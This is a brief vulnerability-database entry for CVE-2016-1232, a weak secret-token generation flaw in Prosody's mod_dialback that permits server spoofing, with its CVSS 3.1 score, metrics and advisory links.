Authentication Spoofing in Prosody XMPP Server due to Insecure Secret Token Generation
CVE-2016-1232

7.5HIGH

Key Information:

Vendor

Prosody

Status
Prosody
Vendor
CVE Published:
12 January 2016

What is CVE-2016-1232?

The mod_dialback module in Prosody prior to version 0.9.9 contains a flaw in its random value generation for the secret token used in server-to-server dialback authentication. This vulnerability makes it vulnerable to brute force attacks, enabling potential attackers to spoof servers, thereby compromising the integrity of server communications within the XMPP protocol. It is crucial for users to update to the latest version to mitigate this risk.

References

https://prosody.im/issues/issue/571
x_refsource_CONFIRM
http://lists.fedoraproject.org/pipermail/package-announce...
vendor-advisoryx_refsource_FEDORA
http://lists.fedoraproject.org/pipermail/package-announce...
vendor-advisoryx_refsource_FEDORA

CVSS V3.1

Score:
7.5
Severity:
HIGH
Confidentiality:
High
Integrity:
None
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
None
User Interaction:
None
Scope:
Unchanged

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.